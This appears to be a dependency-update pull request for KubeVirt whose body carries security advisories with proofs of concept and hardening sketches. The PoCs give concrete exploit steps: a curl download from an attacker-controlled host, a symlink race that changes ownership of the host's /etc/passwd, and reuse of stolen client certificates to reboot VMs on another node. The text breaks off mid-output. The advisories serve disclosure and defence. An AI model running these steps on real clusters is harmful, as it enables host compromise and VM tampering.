
chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24)#837

Open
redhat-renovate-bot wants to merge 1 commit into release-v0.24 from renovate/release-v0.24-go-kubevirt.io-kubevirt-vulnerability

Conversation

redhat-renovate-bot (Collaborator) commented Apr 20, 2026

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package | Type | Update | Change
kubevirt.io/kubevirt | require | minor | v1.4.0 → v1.8.2

KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt

CVE-2025-64432 / GHSA-38jw-g2qx-4286 / GO-2025-4103

More information

Details

KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes

CVE-2025-64437 / GHSA-2r4r-5x78-mvqf / GO-2025-4102

More information

Details

Summary


It is possible to trick the virt-handler component into changing the ownership of arbitrary files on the host node to the unprivileged user with UID 107 due to mishandling of symlinks when determining the root mount of a virt-launcher pod.

Details


In the current implementation, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher), thus compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.
To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod.
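
For context, the following is a minimal hardening sketch, not KubeVirt's actual patch: before deriving the pod's root mount from the launcher socket, reject anything that is not a real unix socket. The socket path and the helper name are illustrative assumptions.

// hypothetical hardening sketch (illustrative names, assumed socket path)
package main

import (
	"fmt"
	"os"
)

// checkLauncherSock refuses symlinked sockets, closing the redirection
// primitive described above. os.Lstat does not follow symlinks.
func checkLauncherSock(path string) error {
	fi, err := os.Lstat(path)
	if err != nil {
		return fmt.Errorf("stat %s: %w", path, err)
	}
	if fi.Mode()&os.ModeSymlink != 0 {
		return fmt.Errorf("%s is a symlink; refusing isolation detection", path)
	}
	if fi.Mode()&os.ModeSocket == 0 {
		return fmt.Errorf("%s is not a unix socket", path)
	}
	return nil
}

func main() {
	if err := checkLauncherSock("/var/run/kubevirt/sockets/launcher-sock"); err != nil {
		fmt.Println("aborting:", err)
	}
}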

PoC


In this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:

  1. A symbolic link (launcher-sock) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries.
  2. Another symbolic link (disk.img) is employed to alter the perceived location of data within a PVC, redirecting it to a file owned by root on the host filesystem.
  3. As a result, the ownership of an existing host file owned by root is changed to a less privileged user with UID 107.

It is assumed that an attacker has access to a virt-launcher pod's file system (for example, obtained using another vulnerability) and also has access to the host file system with the privileges of the qemu user (UID=107). It is also assumed that they can create unprivileged user namespaces:

admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1

The steps below are inspired by an article in which the attacker constructs an isolated environment solely using Linux namespaces and an augmented Alpine container root file system.

##### Download a container file system from an attacker-controlled location
qemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar

##### Create a directory and extract the file system in it
qemu-compromised@minikube:~$  mkdir rootfs_alpine && tar -xf augmented-alpine.tar -C rootfs_alpine

##### Create a MOUNT and remapped USER namespace environment and execute a shell process in it
qemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh

##### Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.
##### The user is root in its new USER namespace
root@minikube:~$ mount --bind rootfs_alpine rootfs_alpine && cd rootfs_alpine && mkdir hostfs_root

##### Swap the current root of the process and store the old one within a directory
root@minikube:~$ pivot_root . hostfs_root 
root@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin

##### Create the directory with the same path as the PVC mounted within the `virt-launcher`. In it `virt-handler` will search for a `disk.img` file associated with a volume mount
root@minikube:~$ PVC_PATH="/var/run/kubevirt-private/vmi-disks/corrupted-pvc" && \
mkdir -p "${PVC_PATH}" && \
cd "${PVC_PATH}"

##### Create the `disk.img` symlink pointing to `/etc/passwd` of the host in the old root mount directory
root@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img

##### Create the socket which will confuse the isolation detector and start listening on it
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -

After the environment is set, the launcher-sock in the virt-launcher container should be replaced with a symlink to ../../../../../../../../../proc/2245509/root/tmp/bad.sock (2245509 is the PID of the above isolated shell process). This must be done, however, at the right moment. For this demonstration, it was decided to trigger the bug by leveraging a race condition when creating or updating a VMI:

//pkg/virt-handler/vm.go

func (c *VirtualMachineController) vmUpdateHelperDefault(origVMI *v1.VirtualMachineInstance, domainExists bool) error {
	// ...
	// !!! MK: the change should happen here, before executing the line below !!!
	isolationRes, err := c.podIsolationDetector.Detect(vmi)
	if err != nil {
		return fmt.Errorf(failedDetectIsolationFmt, err)
	}
	virtLauncherRootMount, err := isolationRes.MountRoot()
	if err != nil {
		return err
	}
	// ...

	// initialize disks images for empty PVC
	hostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)
	// MK: here the permissions are changed
	err = hostDiskCreator.Create(vmi)
	if err != nil {
		return fmt.Errorf("preparing host-disks failed: %v", err)
	}
	// ...

The manifest of the VMI which is going to trigger the bug is:

##### The PVC will be used for the `disk.img` related bug
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: corrupted-pvc
spec:
  accessModes:
    - ReadWriteMany
  resources:
    requests:
      storage: 500Mi
---
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: launcher-symlink-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: corrupted-pvc
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: corrupted-pvc
    persistentVolumeClaim:
      claimName: corrupted-pvc
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

Just before the marked line is executed, the attacker should replace the launcher-sock with a symlink to the bad.sock controlled by the isolated process:

##### the namespaced process controlled by the attacker has pid=2245509
qemu-compromised@minikube:~$ p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}') &&  ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock

Upon successful exploitation, virt-handler connects to the attacker-controlled socket, misinterprets the root mount and changes the ownership of the host's /etc/passwd file:

##### `virt-launcher` connects successfully
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
...
2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 "<anon>" on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010
2025/05/27 17:17:35 socat[2245509] N listening on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio
2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1]
PRI * HTTP/2.0
admin@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 compromised-qemu systemd-resolve 1337 May 23 13:19 /etc/passwd

admin@minikube:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
compromised-qemu:x:107:107::/home/compromised-qemu:/bin/bash

The attacker controlling an unprivileged user can now update the contents of the file.

Impact


This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher), thus compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.

Severity

  • CVSS Score: 5.0 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes in kubevirt.io/kubevirt

CVE-2025-64437 / GHSA-2r4r-5x78-mvqf / GO-2025-4102

More information

Details

KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing in kubevirt.io/kubevirt

CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107

More information

Details

KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt's Improper TLS Certificate Management Handling Allows API Identity Spoofing

CVE-2025-64434 / GHSA-ggp9-c99x-54gp / GO-2025-4107

More information

Details

Summary

Due to improper TLS certificate management, a compromised virt-handler could impersonate virt-api by using its own TLS credentials, allowing it to initiate privileged operations against another virt-handler.

Details


Because of improper TLS certificate management, a compromised virt-handler instance can reuse its TLS bundle to impersonate virt-api, enabling unauthorized access to VM lifecycle operations on other virt-handler nodes.
The virt-api component acts as a sub-resource server, and it proxies API VM lifecycle requests to virt-handler instances.
The communication between virt-api and virt-handler instances is secured using mTLS. The former acts as the client while the latter acts as the server. The client certificate used by virt-api is defined in the source code as follows and has the following properties:

//pkg/virt-api/api.go

const (
	// ...
	defaultCAConfigMapName     = "kubevirt-ca"
	// ...
	defaultHandlerCertFilePath = "/etc/virt-handler/clientcertificates/tls.crt"
	defaultHandlerKeyFilePath  = "/etc/virt-handler/clientcertificates/tls.key"
)
##### verify virt-api's certificate properties from the docker container in which it is deployed using Minikube
admin@minikube:~$ openssl x509 -text -in \
$(CID=$(docker ps --filter 'Name=virt-api' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 127940157512425330 (0x1c688e539091f72)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

The virt-handler component verifies the signature of client certificates using a self-signed root CA. The latter is generated by virt-operator when the KubeVirt stack is deployed and is stored within a ConfigMap in the kubevirt namespace. This ConfigMap is used as a trust anchor by all virt-handler instances to verify client certificates.

##### inspect the self-signed root CA used to sign virt-api and virt-handler's certificates
admin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath='{.data.ca-bundle}' | openssl x509 -text | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 319368675363923930 (0x46ea01e3f7427da)
Issuer: CN=kubevirt.io@1747579138
Subject: CN=kubevirt.io@1747579138

The kubevirt-ca is also used to sign the server certificate which is used by a virt-handler instance:

admin@minikube:~$ openssl x509 -text -in \
$(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "servercertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

##### the virt-handler's server certificate is issued by the same root CA
Serial Number: 7584450293644921758 (0x6941615ba1500b9e)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:node:virt-handler

In addition to the validity of the signature, the virt-handler component also verifies the CN field of the presented certificate:


//pkg/util/tls/tls.go

func SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {
	// #nosec cause: InsecureSkipVerify: true
	// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed

	// ...
	// XXX: We need to verify the cert ourselves because we don't have DNS or IP on the certs at the moment
	VerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
		return verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, "client")
	},
	// ...
}

func verifyPeerCert(rawCerts [][]byte, externallyManaged bool, certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {
	// ...
	rawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]
	c, err := x509.ParseCertificate(rawPeer)
	// ...
	fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
	if !externallyManaged && c.Subject.CommonName != fullCommonName {
		return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
	}
	// ...
}

The above code illustrates that client certificates accepted by KubeVirt should have the CN kubevirt.io:system:client:virt-handler, which is the same as the CN present in virt-api's certificate. However, the latter is not the only component in the KubeVirt stack which can communicate with a virt-handler instance.

In addition to the extension API server (virt-api), any other virt-handler instance can communicate with a given virt-handler. This happens in the context of VM migration operations. When a VM is migrated from one node to another, the virt-handlers on both nodes use structures called ProxyManager to communicate back and forth on the state of the migration.

//pkg/virt-handler/migration-proxy/migration-proxy.go

func NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {
	return &migrationProxyManager{
		sourceProxies:   make(map[string][]*migrationProxy),
		targetProxies:   make(map[string][]*migrationProxy),
		serverTLSConfig: serverTLSConfig,
		clientTLSConfig: clientTLSConfig,
		config:          config,
	}
}

This communication follows a classical client-server model, where the virt-handler on the migration source node acts as a client and the virt-handler on the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by the virt-handler acting as a migration destination node is the same as the one which is used for the communication between the same virt-handler and the virt-api in the context of VM lifecycle operations (CN=kubevirt.io:system:node:virt-handler). However, the client certificate which is used by a virt-handler instance has the same CN as the client certificate used by virt-api.

admin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | tr -d '"[:space:]')/tls.crt | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 2951695854686290384 (0x28f687bdb791c1d0)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

Although the migration procedure, where two separate virt-handler instances coordinate the transfer of a VM's state, is not directly tied to the communication between virt-api and virt-handler during VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. Specifically, the client certificates used by virt-handler and virt-api share the same CN field, despite the use of different, randomly allocated ports for the two types of communication.
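
A conceivable mitigation, sketched below as a minimal Go fragment with illustrative names (the role-specific CNs are assumptions, not real KubeVirt identities), is to give each caller role its own client CN and have each listener verify the exact identity it expects rather than one shared name:

// hypothetical sketch of role-separated peer verification (illustrative names)
package rolesep

import (
	"crypto/x509"
	"fmt"
)

// verifyPeerCN accepts the peer only if its CN is in the allow-list the
// listener was configured with, so a stolen migration-client bundle can
// no longer pass as virt-api on the lifecycle endpoint.
func verifyPeerCN(rawCert []byte, allowedCNs map[string]bool) error {
	c, err := x509.ParseCertificate(rawCert)
	if err != nil {
		return err
	}
	if !allowedCNs[c.Subject.CommonName] {
		return fmt.Errorf("unexpected peer CN %q", c.Subject.CommonName)
	}
	return nil
}

Under such a scheme, the lifecycle listener would allow only a virt-api-specific CN while the migration listener would allow only a migration-specific CN, so compromising one credential would no longer grant both roles.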

PoC


To illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (minikube and minikube-m02), thus with two virt-handler instances, alongside a VMI running on one of the nodes. It is considered that an attacker has obtained access to the client certificate bundle used by the virt-handler instance running on the compromised node (minikube), while the virtual machine is running on the other node (minikube-m02). Thus, they can interact with the sub-resource API exposed by the other virt-handler instance and control the lifecycle of the VMs running on that node:

##### the deployed VMI on the non-compromised node minikube-m02
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
    kubevirt.io/size: small
  name: mishandling-common-name-in-certificate-handler
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=
##### the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3
attacker@minikube:~$ curl -k https://10.244.1.3:8186/
curl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0

##### get the certificate bundle directory and redo the request
attacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter 'Name=virt-handler' --format='{{.ID}}' | head -n 1) | grep "clientcertificates:ro" | cut -d ':' -f1 | tr -d '"[:space:]')

attacker@minikube:~$ curl -k  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/
404: Page Not Found

##### soft reboot the VMI instance running on the other node
attacker@minikube:~$ curl -ki  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot  -XPUT
HTTP/1.1 202 Accepted

##### the VMI mishandling-common-name-in-certificate-handler has been rebooted

Impact


Due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances, potentially compromising the integrity and availability of the VMs they manage.

Severity

  • CVSS Score: 4.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer

CVE-2025-64432 / GHSA-38jw-g2qx-4286 / GO-2025-4103

More information

Details

Summary


A flawed implementation of the Kubernetes aggregation layer's authentication flow could enable bypassing RBAC controls.

Details


It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap.

The Kubernetes API server proxies received client requests through a component called the aggregator (part of the Kubernetes API server), which authenticates to the virt-api server using a certificate signed by the CA specified via the --requestheader-client-ca-file CLI flag. This CA bundle is primarily used in the context of aggregated API servers, where the Kubernetes API server acts as a trusted front-end proxy forwarding requests.

While this is the most common use case, the same CA bundle can also support less common scenarios, such as issuing certificates to authenticating front-end proxies. These proxies can be deployed by organizations to extend Kubernetes' native authentication mechanisms or to integrate with existing identity systems (e.g., LDAP, OAuth2, SSO platforms). In such cases, the Kubernetes API server can trust these external proxies as legitimate authenticators, provided their client certificates are signed by the same CA as the one defined via --requestheader-client-ca-file.
Nevertheless, these external authentication proxies are not supposed to directly communicate with aggregated API servers.

Thus, by failing to validate the CN field in the client TLS certificate, the virt-api component may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component.

However, two key prerequisites must be met for successful exploitation:

  • The attacker must possess a valid front-end proxy certificate signed by the trusted CA (requestheader-client-ca-file). For example, they can steal the certificate material by compromising a front-end proxy or they could obtain a bundle by exploiting a poorly configured and managed PKI system.

  • The attacker must have network access to the virt-api service, such as via a compromised or controlled pod within the cluster.

These conditions significantly reduce the likelihood of exploitation. In addition, the virt-api component acts as a sub-resource server, meaning it only handles requests for specific resources and sub-resources. The requests it handles are mostly related to the lifecycle of already existing resources.

Nonetheless, if these conditions are met, the vulnerability could be exploited by a pod-level attacker to escalate privileges and manipulate existing virtual machine workloads, potentially violating their CIA (Confidentiality, Integrity and Availability).
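
For reference, below is a minimal sketch of the missing check, assuming the server has already read requestheader-allowed-names from the extension-apiserver-authentication ConfigMap; the package and function names are illustrative, not the upstream patch. Per Kubernetes convention, an empty list means any CN signed by the request-header CA is accepted.

// hypothetical allowed-names check (illustrative names)
package authproxy

import (
	"crypto/x509"
	"fmt"
)

// verifyFrontProxy accepts a front-proxy client certificate only when its
// CN appears in requestheader-allowed-names; an empty list allows any CN
// signed by the configured CA.
func verifyFrontProxy(cert *x509.Certificate, allowedNames []string) error {
	if len(allowedNames) == 0 {
		return nil
	}
	for _, name := range allowedNames {
		if cert.Subject.CommonName == name {
			return nil
		}
	}
	return fmt.Errorf("client CN %q not in requestheader-allowed-names", cert.Subject.CommonName)
}

With --requestheader-allowed-names=front-proxy-client, as in the Minikube setup shown below, the rogue certificate generated in the PoC would be rejected by such a check.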

PoC


Bypassing authentication

In this section, it is demonstrated how an attacker could use a certificate with a different CN field to bypass the authentication of the aggregation layer and perform arbitrary API sub-resource requests to the virt-api server.

The kube-apiserver has been launched with the following CLI flags:

admin@minikube:~$ kubectl -n kube-system describe pod kube-apiserver-minikube | grep Command -A 28
    Command:
      kube-apiserver
      --advertise-address=192.168.49.2
      --allow-privileged=true
      --authorization-mode=Node,RBAC
      --client-ca-file=/var/lib/minikube/certs/ca.crt
      --enable-admission-plugins=NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota
      --enable-bootstrap-token-auth=true
      --etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt
      --etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt
      --etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key
      --etcd-servers=https://127.0.0.1:2379
      --kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt
      --kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key
      --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
      --proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt
      --proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key
      --requestheader-allowed-names=front-proxy-client
      --requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt
      --requestheader-extra-headers-prefix=X-Remote-Extra-
      --requestheader-group-headers=X-Remote-Group
      --requestheader-username-headers=X-Remote-User
      --secure-port=8443
      --service-account-issuer=https://kubernetes.default.svc.cluster.local
      --service-account-key-file=/var/lib/minikube/certs/sa.pub
      --service-account-signing-key-file=/var/lib/minikube/certs/sa.key
      --service-cluster-ip-range=10.96.0.0/12
      --tls-cert-file=/var/lib/minikube/certs/apiserver.crt
      --tls-private-key-file=/var/lib/minikube/certs/apiserver.key

By default, Minikube generates a self-signed CA certificate (/var/lib/minikube/certs/front-proxy-ca.crt) and uses it to sign the certificate used by the aggregator (/var/lib/minikube/certs/front-proxy-client.crt):

##### inspect the self-signed front-proxy-ca certificate
admin@minikube:~$ openssl x509 -text -in  /var/lib/minikube/certs/front-proxy-ca.crt | grep -e "Issuer:" -e "Subject:"
        Issuer: CN = front-proxy-ca
        Subject: CN = front-proxy-ca

##### inspect the front-proxy-client certificate signed with the above cert
$ openssl x509 -text -in  /var/lib/minikube/certs/front-proxy-client.crt | grep -e "Issuer:" -e "Subject:"
        Issuer: CN = front-proxy-ca
        Subject: CN = front-proxy-client

One can also inspect the contents of the extension-apiserver-authentication ConfigMap which is used as a trust anchor by all extension API servers:

admin@minikube:~$ kubectl -n kube-system describe configmap extension-apiserver-authentication
Name:         extension-apiserver-authentication
Namespace:    kube-system
Labels:       <none>
Annotations:  <none>

Data
====
requestheader-client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDETCCAfmgAwIBAgIIN59KhbrmeJkwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UE
AxMOZnJvbnQtcHJveHktY2EwHhcNMjUwNTE4MTQzMTI3WhcNMzUwNTE2MTQzNjI3
WjAZMRcwFQYDVQQDEw5mcm9udC1wcm94eS1jYTCCASIwDQYJKoZIhvcNAQEBBQAD
ggEPADCCAQoCggEBALOFlqbM1h3uhTdU9XBZQ6AX8S7M0nT5SgSOSItJrVwjNUv/
t4FAQxnGPW7fhp9A9CeQ92DGLXkm88fgHCgnPJuodKgX8fS7NHfswvXKkgo6C4UO
2AmW0NAkuKMyTmf1tWugot7hj3sGFfIzVSLL73wm1Ci8unTaGKZG01ZZalL1kzz9
ObpmEn7DQvSJd7m5gALP4KPJdkFjoagMI4UlIownARl0h2DX5WAKy0ynGfEBvw+P
hEbuVPb+egeUVTn9/4JIqdUw21tUQrmbQqPib8BByueiOYqEerGxZDpLAxh230VG
Q6omoyUHjE6SIMBoUnAqAdLbTElVbLWJawlLZzECAwEAAaNdMFswDgYDVR0PAQH/
BAQDAgKkMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFPjiIeJVR7zQBCkpmkEa
I+70PxA8MBkGA1UdEQQSMBCCDmZyb250LXByb3h5LWNhMA0GCSqGSIb3DQEBCwUA
A4IBAQBiNTe9Sdv9RnKqTyt+Xj0NJrScVOiWPb9noO5XSyBtOy8F8b+ZWAtzc+eI
G/g6hpiT7lq3hVtmDNiE6nsP3tywXf0mgg7blRC0l3DxGtSzJZlbahAI4/U5yen7
orKiWiD/ObK2rGbt1toVRyvJzPi3hYjh4mA6GMyFbOC6snopNyM9oj+b/EuTCavf
l9WTNn2ZZQ1nYfJsLjOY5k/VtpZw1D/QwYt0u/A83RxEeBvK2aZPsq/nA0jqeHhe
VHauDQslkjMw0yrFc1b+Ju4Ly+BwH+Mi7ALUINc8EVncWZyM2L7B4N9XwPSp6YPX
fZnj69fu0JWfrq88M+LnKOyfkqi4
-----END CERTIFICATE-----

requestheader-extra-headers-prefix:
----
["X-Remote-Extra-"]

requestheader-group-headers:
----
["X-Remote-Group"]

requestheader-username-headers:
----
["X-Remote-User"]

client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTI1MDQxMTE3MzM1N1oXDTM1MDQxMDE3MzM1N1owFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALXK
ShgBkCDLETxDOSknvWHr7lfnvLtSCLf3VPVwFQNDhLAuFBc2H1MSMqzW6hcyxAVA
arQbOe36zxHjHpaP3VlGOEw3CVesPNw6ZToGuhpRq1inQATzeg2yc5w1jtRjLXhb
BWp7zCDk1qoHws/fWpaWOe3oQq4ZOA1+bJDsmZ7LjmMtOKHdqftEFz/RGVrn7nKD
/WXyGgKgSSNFsDK+Ow6gN6r3b10S82VQ5MwncJuqGO1r036yjwWBU8PEpknc/MhG
J/bMdI/w49rxlEAE92OadYRNvC0SDhG0HyPj9BMVx8ZG5X28lZMgq98UzVgu9Try
e8tndHqxUaU7rjO7j/8CAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBS8FpfTfvGkXDPJEXUoTQs+MwVhPjANBgkqhkiG9w0BAQsFAAOCAQEAFg+gxZ7W
zZValzuoXSc3keutB4U0QXFzjOhTVo8D/qsBNkxasdsrYjF2Do/KuGxCefXRZbTe
QWX3OFhiiabd0nkGoNTxXoPqwOJHczk+bo8L2Vcva1JAi/tBVNkPULzZilZWgWQz
8d8NgABP7MpHnOJVvAr6BEaS1wpoLzyEMXm6YToZXjDX1ajzyyLonQ9So1Y7aj6v
yPQ8OO2TUhkEpzb28/s5Pr33QT8W0/FX3m8+MGSNvWdHNZ+UzXLk3iSfySgjmciZ
o4C5yKLZgKFxoFBxY25emr6QDZW+3HicZj6sPsblGlvlBF5wQgF65msgjvmRfTLq
JPwzd6yDCMUuZQ==
-----END CERTIFICATE-----

requestheader-allowed-names:
----
["front-proxy-client"]

BinaryData
====

Events:  <none>

It is assumed that an attacker has obtained access to a Kubernetes pod and could communicate with the virt-api service, reachable at 10.244.0.6.

root@compromised-pod:~$ curl -ks https://10.244.0.6:8443/ | jq .
{
  "paths": [
    "/apis",
    "/openapi/v2",
